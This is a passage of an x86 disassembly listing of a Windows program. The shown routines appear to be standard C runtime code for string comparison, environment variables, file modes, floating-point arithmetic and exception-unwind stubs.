mov esi, [ebp+var_20]
loc_42E4F8: ; CODE XREF: sub_42E2C0+224�j
cmp edi, ebx
jz short loc_42E529
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
call dword_42F098 ; MultiByteToWideChar
test eax, eax
jz short loc_42E529
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_42F12C ; CompareStringW
jmp short loc_42E52B
; ---------------------------------------------------------------------------
loc_42E529: ; CODE XREF: sub_42E2C0+63�j
; sub_42E2C0+C6�j ...
xor eax, eax
loc_42E52B: ; CODE XREF: sub_42E2C0+BF�j
; sub_42E2C0+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_42E2C0 endp
; =============== S U B R O U T I N E =======================================
sub_42E53D proc near ; CODE XREF: sub_429BA7+81�p
; sub_42E2C0+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_42E55A
loc_42E54D: ; CODE XREF: sub_42E53D+1B�j
cmp byte ptr [eax], 0
jz short loc_42E55A
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_42E54D
loc_42E55A: ; CODE XREF: sub_42E53D+E�j
; sub_42E53D+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_42E565
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_42E565: ; CODE XREF: sub_42E53D+21�j
mov eax, edx
retn
sub_42E53D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E568 proc near ; CODE XREF: sub_42CEF8+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_42E5CC
push 3Dh
push [ebp+arg_0]
call sub_42CA33
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_42E5CC
cmp [ebp+arg_0], esi
jz short loc_42E5CC
mov eax, dword_631488
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, dword_63148C
jnz short loc_42E5B2
push eax
call sub_42E747
pop ecx
mov dword_631488, eax
loc_42E5B2: ; CODE XREF: sub_42E568+3C�j
cmp eax, edi
jnz short loc_42E60A
cmp [ebp+arg_4], edi
jz short loc_42E5D4
cmp dword_631490, edi
jz short loc_42E5D4
call sub_42CEF8
test eax, eax
jz short loc_42E60A
loc_42E5CC: ; CODE XREF: sub_42E568+D�j
; sub_42E568+22�j ...
or eax, 0FFFFFFFFh
loc_42E5CF: ; CODE XREF: sub_42E568+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42E5D4: ; CODE XREF: sub_42E568+51�j
; sub_42E568+59�j
cmp ebx, edi
jnz loc_42E6E8
push 4
call sub_422F79
cmp eax, edi
pop ecx
mov dword_631488, eax
jz short loc_42E5CC
mov [eax], edi
cmp dword_631490, edi
jnz short loc_42E60A
push 4
call sub_422F79
cmp eax, edi
pop ecx
mov dword_631490, eax
jz short loc_42E5CC
mov [eax], edi
loc_42E60A: ; CODE XREF: sub_42E568+4C�j
; sub_42E568+62�j ...
sub esi, [ebp+arg_0]
mov edi, dword_631488
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_42E6EF
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_42E66A
cmp dword ptr [edi], 0
jz short loc_42E66A
test ebx, ebx
jz short loc_42E662
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_4230B3
pop ecx
loc_42E63C: ; CODE XREF: sub_42E568+E2�j
cmp dword ptr [edi], 0
jz short loc_42E64C
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_42E63C
; ---------------------------------------------------------------------------
loc_42E64C: ; CODE XREF: sub_42E568+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_4285CC
pop ecx
test eax, eax
pop ecx
jz short loc_42E69C
jmp short loc_42E697
; ---------------------------------------------------------------------------
loc_42E662: ; CODE XREF: sub_42E568+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_42E69C
; ---------------------------------------------------------------------------
loc_42E66A: ; CODE XREF: sub_42E568+BD�j
; sub_42E568+C2�j
test ebx, ebx
jnz short loc_42E6E8
test esi, esi
jge short loc_42E674
neg esi
loc_42E674: ; CODE XREF: sub_42E568+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_4285CC
pop ecx
test eax, eax
pop ecx
jz loc_42E5CC
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_42E697: ; CODE XREF: sub_42E568+F8�j
mov dword_631488, eax
loc_42E69C: ; CODE XREF: sub_42E568+F6�j
; sub_42E568+100�j
cmp [ebp+arg_4], 0
jz short loc_42E6E8
push [ebp+arg_0]
call sub_422120
inc eax
inc eax
push eax
call sub_422F79
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_42E6E8
push [ebp+arg_0]
push esi
call sub_423260
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call dword_42F128 ; SetEnvironmentVariableA
push esi
call sub_4230B3
pop ecx
loc_42E6E8: ; CODE XREF: sub_42E568+6E�j
; sub_42E568+104�j ...
xor eax, eax
jmp loc_42E5CF
sub_42E568 endp
; =============== S U B R O U T I N E =======================================
sub_42E6EF proc near ; CODE XREF: sub_42E568+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, dword_631488
push edi
mov eax, [esi]
test eax, eax
jz short loc_42E72A
mov edi, [esp+8+arg_4]
loc_42E701: ; CODE XREF: sub_42E6EF+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_42CEB9
add esp, 0Ch
test eax, eax
jnz short loc_42E720
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_42E73A
test al, al
jz short loc_42E73A
loc_42E720: ; CODE XREF: sub_42E6EF+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_42E701
loc_42E72A: ; CODE XREF: sub_42E6EF+C�j
mov eax, esi
sub eax, dword_631488
sar eax, 2
neg eax
loc_42E737: ; CODE XREF: sub_42E6EF+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42E73A: ; CODE XREF: sub_42E6EF+2B�j
; sub_42E6EF+2F�j
mov eax, esi
sub eax, dword_631488
sar eax, 2
jmp short loc_42E737
sub_42E6EF endp
; =============== S U B R O U T I N E =======================================
sub_42E747 proc near ; CODE XREF: sub_42E568+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_42E756
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_42E756: ; CODE XREF: sub_42E747+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_42E768
loc_42E75E: ; CODE XREF: sub_42E747+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_42E75E
loc_42E768: ; CODE XREF: sub_42E747+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_422F79
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_42E789
push 9
call sub_424FCB
pop ecx
loc_42E789: ; CODE XREF: sub_42E747+38�j
mov eax, [edi]
mov ebx, edi
loc_42E78D: ; CODE XREF: sub_42E747+5B�j
test eax, eax
jz short loc_42E7A4
push eax
add ebx, 4
call sub_42EBAE
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_42E78D
; ---------------------------------------------------------------------------
loc_42E7A4: ; CODE XREF: sub_42E747+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_42E747 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
or ecx, ecx
jz loc_42E8AA
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
lea eax, dword_6314C0
cmp dword ptr [eax+8], 0
jnz short loc_42E821
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_42E7DC: ; CODE XREF: .text:0042E803�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_42E805
or al, al
jz short loc_42E805
inc esi
inc edi
cmp ah, bh
jb short loc_42E7F4
cmp ah, bl
ja short loc_42E7F4
add ah, dh
loc_42E7F4: ; CODE XREF: .text:0042E7EC�j
; .text:0042E7F0�j
cmp al, bh
jb short loc_42E7FE
cmp al, bl
ja short loc_42E7FE
add al, dh
loc_42E7FE: ; CODE XREF: .text:0042E7F6�j
; .text:0042E7FA�j
cmp ah, al
jnz short loc_42E80F
dec ecx
jnz short loc_42E7DC
loc_42E805: ; CODE XREF: .text:0042E7E2�j
; .text:0042E7E6�j
xor ecx, ecx
cmp ah, al
jz loc_42E8AA
loc_42E80F: ; CODE XREF: .text:0042E800�j
mov ecx, 0FFFFFFFFh
jb loc_42E8AA
neg ecx
jmp loc_42E8AA
; ---------------------------------------------------------------------------
loc_42E821: ; CODE XREF: .text:0042E7D1�j
lock inc dword_63198C
cmp dword_631988, 0
jg short loc_42E835
push 0
jmp short loc_42E84E
; ---------------------------------------------------------------------------
loc_42E835: ; CODE XREF: .text:0042E82F�j
lock dec dword_63198C
mov ebx, ecx
push 13h
call sub_428436
mov dword ptr [esp], 1
mov ecx, ebx
loc_42E84E: ; CODE XREF: .text:0042E833�j
xor eax, eax
xor ebx, ebx
mov edi, edi
loc_42E854: ; CODE XREF: .text:0042E87D�j
mov al, [esi]
or eax, eax
mov bl, [edi]
jz short loc_42E87F
or ebx, ebx
jz short loc_42E87F
inc esi
inc edi
push ecx
push eax
push ebx
call sub_42A7A0
mov ebx, eax
add esp, 4
call sub_42A7A0
add esp, 4
pop ecx
cmp eax, ebx
jnz short loc_42E885
dec ecx
jnz short loc_42E854
loc_42E87F: ; CODE XREF: .text:0042E85A�j
; .text:0042E85E�j
xor ecx, ecx
cmp eax, ebx
jz short loc_42E88E
loc_42E885: ; CODE XREF: .text:0042E87A�j
mov ecx, 0FFFFFFFFh
jb short loc_42E88E
neg ecx
loc_42E88E: ; CODE XREF: .text:0042E883�j
; .text:0042E88A�j
pop eax
or eax, eax
jnz short loc_42E89C
lock dec dword_63198C
jmp short loc_42E8AA
; ---------------------------------------------------------------------------
loc_42E89C: ; CODE XREF: .text:0042E891�j
mov ebx, ecx
push 13h
call sub_428497
add esp, 4
mov ecx, ebx
loc_42E8AA: ; CODE XREF: .text:0042E7BB�j
; .text:0042E809�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_42E8B1 proc near ; CODE XREF: sub_42D6D7+68�p
; sub_42D6D7+B9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov esi, 8000h
mov ecx, dword_6319E0[ecx*4]
lea edx, [ecx+eax*4+4]
mov cl, [ecx+eax*4+4]
mov al, cl
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_42E8E7
and cl, 7Fh
jmp short loc_42E8F4
; ---------------------------------------------------------------------------
loc_42E8E7: ; CODE XREF: sub_42E8B1+2F�j
cmp [esp+4+arg_4], 4000h
jnz short loc_42E902
or cl, 80h
loc_42E8F4: ; CODE XREF: sub_42E8B1+34�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42E902: ; CODE XREF: sub_42E8B1+3E�j
call sub_426528
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
pop esi
retn
sub_42E8B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E912 proc near ; CODE XREF: sub_42E02D+165�p
; sub_42EB32+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_42EB12
cmp cx, 7FFFh
jnb loc_42EB12
cmp dx, 0BFFDh
ja loc_42EB12
cmp dx, 3FBFh
ja short loc_42E97B
xor eax, eax
jmp short loc_42E9B5
; ---------------------------------------------------------------------------
loc_42E97B: ; CODE XREF: sub_42E912+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_42E99D
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_42E99D
xor eax, eax
cmp [esi+4], eax
jnz short loc_42E99F
cmp [esi], eax
jnz short loc_42E99F
jmp loc_42EB0C
; ---------------------------------------------------------------------------
loc_42E99D: ; CODE XREF: sub_42E912+71�j
; sub_42E912+79�j
xor eax, eax
loc_42E99F: ; CODE XREF: sub_42E912+80�j
; sub_42E912+84�j
cmp cx, ax
jnz short loc_42E9C2
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_42E9C2
cmp [ebx+4], eax
jnz short loc_42E9C2
cmp [ebx], eax
jnz short loc_42E9C2
loc_42E9B5: ; CODE XREF: sub_42E912+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_42EB2D
; ---------------------------------------------------------------------------
loc_42E9C2: ; CODE XREF: sub_42E912+90�j
; sub_42E912+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_42E9D2: ; CODE XREF: sub_42E912+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_42EA26
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_42E9EE: ; CODE XREF: sub_42E912+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_42D9BB
add esp, 0Ch
test eax, eax
jz short loc_42EA19
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_42EA19: ; CODE XREF: sub_42E912+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_42E9EE
loc_42EA26: ; CODE XREF: sub_42E912+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_42E9D2
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_42EA69
loc_42EA44: ; CODE XREF: sub_42E912+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_42EA62
lea eax, [ebp+var_24]
push eax
call sub_42DA3A
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_42EA44
loc_42EA62: ; CODE XREF: sub_42E912+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_42EAA2
loc_42EA69: ; CODE XREF: sub_42E912+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_42EAA2
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_42EA82: ; CODE XREF: sub_42E912+184�j
test byte ptr [ebp+var_24], 1
jz short loc_42EA8B
inc [ebp+var_14]
loc_42EA8B: ; CODE XREF: sub_42E912+174�j
lea eax, [ebp+var_24]
push eax
call sub_42DA68
dec ebx
pop ecx
jnz short loc_42EA82
cmp [ebp+var_14], 0
jz short loc_42EAA2
or byte ptr [ebp+var_24], 1
loc_42EAA2: ; CODE XREF: sub_42E912+155�j
; sub_42E912+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_42EAB9
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_42EAEE
loc_42EAB9: ; CODE XREF: sub_42E912+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_42EAEB
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_42EAE6
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_42EAE0
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_42EAEE
; ---------------------------------------------------------------------------
loc_42EAE0: ; CODE XREF: sub_42E912+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_42EAEE
; ---------------------------------------------------------------------------
loc_42EAE6: ; CODE XREF: sub_42E912+1B5�j
inc [ebp+var_20+2]
jmp short loc_42EAEE
; ---------------------------------------------------------------------------
loc_42EAEB: ; CODE XREF: sub_42E912+1AB�j
inc [ebp+var_24+2]
loc_42EAEE: ; CODE XREF: sub_42E912+1A5�j
; sub_42E912+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_42EB12
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_42EB0C: ; CODE XREF: sub_42E912+86�j
mov [esi+0Ah], ax
jmp short loc_42EB2D
; ---------------------------------------------------------------------------
loc_42EB12: ; CODE XREF: sub_42E912+42�j
; sub_42E912+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_42EB2D: ; CODE XREF: sub_42E912+AB�j
; sub_42E912+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_42E912 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EB32 proc near ; CODE XREF: sub_42DB5C+440�p
; sub_42E02D+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_44C230
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_42EBAB
jge short loc_42EB5A
mov eax, [ebp+arg_4]
mov ebx, offset dword_44C390
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_42EB5A: ; CODE XREF: sub_42EB32+16�j
cmp [ebp+arg_8], ecx
jnz short loc_42EB65
mov eax, [ebp+arg_0]
mov [eax], cx
loc_42EB65: ; CODE XREF: sub_42EB32+2B�j
cmp [ebp+arg_4], ecx
jz short loc_42EBAB
push esi
push edi
loc_42EB6C: ; CODE XREF: sub_42EB32+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_42EBA4
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_42EB97
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_42EB97: ; CODE XREF: sub_42EB32+57�j
push esi
push [ebp+arg_0]
call sub_42E912
pop ecx
pop ecx
xor ecx, ecx
loc_42EBA4: ; CODE XREF: sub_42EB32+49�j
cmp [ebp+arg_4], ecx
jnz short loc_42EB6C
pop edi
pop esi
loc_42EBAB: ; CODE XREF: sub_42EB32+14�j
; sub_42EB32+36�j
pop ebx
leave
retn
sub_42EB32 endp
; =============== S U B R O U T I N E =======================================
sub_42EBAE proc near ; CODE XREF: sub_41F167+21�p
; sub_42E747+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_42EBD5
push esi
call sub_422120
inc eax
push eax
call sub_422F79
pop ecx
test eax, eax
pop ecx
jz short loc_42EBD5
push esi
push eax
call sub_423260
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_42EBD5: ; CODE XREF: sub_42EBAE+7�j
; sub_42EBAE+1A�j
xor eax, eax
pop esi
retn
sub_42EBAE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42EBE0 proc near ; CODE XREF: sub_41FD0C+4A�p
jmp dword_42F25C
sub_42EBE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42EBE6 proc near ; CODE XREF: sub_41FD0C+33�p
jmp dword_42F260
sub_42EBE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42EBEC proc near ; CODE XREF: sub_41FD0C+F�p
jmp dword_42F258
sub_42EBEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42EBF2 proc near ; CODE XREF: sub_4236D2+23�p
; sub_423978+13�p
jmp dword_42F1F4
sub_42EBF2 endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42EC00: ; DATA XREF: sub_40D75A�o
mov eax, offset dword_42FD90
jmp loc_423721
; ---------------------------------------------------------------------------
align 4
loc_42EC0C: ; DATA XREF: .text:0042FDB8�o
lea ecx, [ebp-24h]
jmp sub_40F08A
; ---------------------------------------------------------------------------
lea ecx, [ebp-34h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
and eax, 1
test eax, eax
jz locret_42EC32
mov ecx, [ebp+8]
jmp sub_40D58A
; ---------------------------------------------------------------------------
locret_42EC32: ; CODE XREF: .text:0042EC24�j
retn
; ---------------------------------------------------------------------------
loc_42EC33: ; DATA XREF: sub_40D810�o
mov eax, offset dword_42FDC4
jmp loc_423721
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-1Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42EC48: ; DATA XREF: sub_40DA0E�o
mov eax, offset dword_42FDE8
jmp loc_423721
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-1Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42EC5C: ; DATA XREF: .text:0042FE10�o
lea ecx, [ebp-3Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42EC64: ; DATA XREF: .text:0042FE18�o
lea ecx, [ebp-3Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42EC6C: ; DATA XREF: .text:0042FE20�o
lea ecx, [ebp-5Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-3Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42EC84: ; DATA XREF: .text:0042FE38�o
lea ecx, [ebp-3Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42EC94: ; DATA XREF: .text:0042FE48�o
lea ecx, [ebp-3Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42ECAC: ; DATA XREF: .text:0042FE60�o
lea ecx, [ebp-3Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42ECC4: ; DATA XREF: .text:0042FE78�o
lea ecx, [ebp-4Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42ECD4: ; DATA XREF: .text:0042FE88�o
lea ecx, [ebp-4Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42ECDC: ; DATA XREF: .text:0042FE90�o
lea ecx, [ebp-2Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42ECF4: ; DATA XREF: sub_40DB4B�o
mov eax, offset dword_42FEA4
jmp loc_423721
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-1F4h]
jmp sub_40F05F
; ---------------------------------------------------------------------------
loc_42ED0B: ; DATA XREF: .text:0042FECC�o
lea ecx, [ebp-30h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0CCh]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0ACh]
jmp sub_40F05F
; ---------------------------------------------------------------------------
lea ecx, [ebp-0F0h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-44h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0BCh]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-58h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-394h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-374h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-204h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-384h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-110h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-304h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-244h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-264h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-160h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-170h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-3A4h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-140h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-344h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-2C4h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-2E4h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0E0h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-1A0h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-234h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-130h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-274h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-254h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-294h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-150h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-190h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-2D4h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-120h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-314h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-2F4h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-334h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-100h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
lea ecx, [ebp-180h]
jmp sub_40D58A
; ---------------------------------------------------------------------------
loc_42EEAC: ; DATA XREF: .text:loc_40DF88�o
mov eax, offset dword_430040
jmp loc_423721
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_40F13B
; ---------------------------------------------------------------------------
loc_42EEC0: ; DATA XREF: sub_40F0E1�o
mov eax, offset dword_4300D8
jmp loc_423721
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-14h]
jmp sub_423BAB
; ---------------------------------------------------------------------------
loc_42EED4: ; DATA XREF: sub_40F1B0�o
mov eax, offset dword_4300FC
jmp loc_423721
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_423BAB
; ---------------------------------------------------------------------------
loc_42EEE8: ; DATA XREF: sub_40F389�o
mov eax, offset dword_43013C
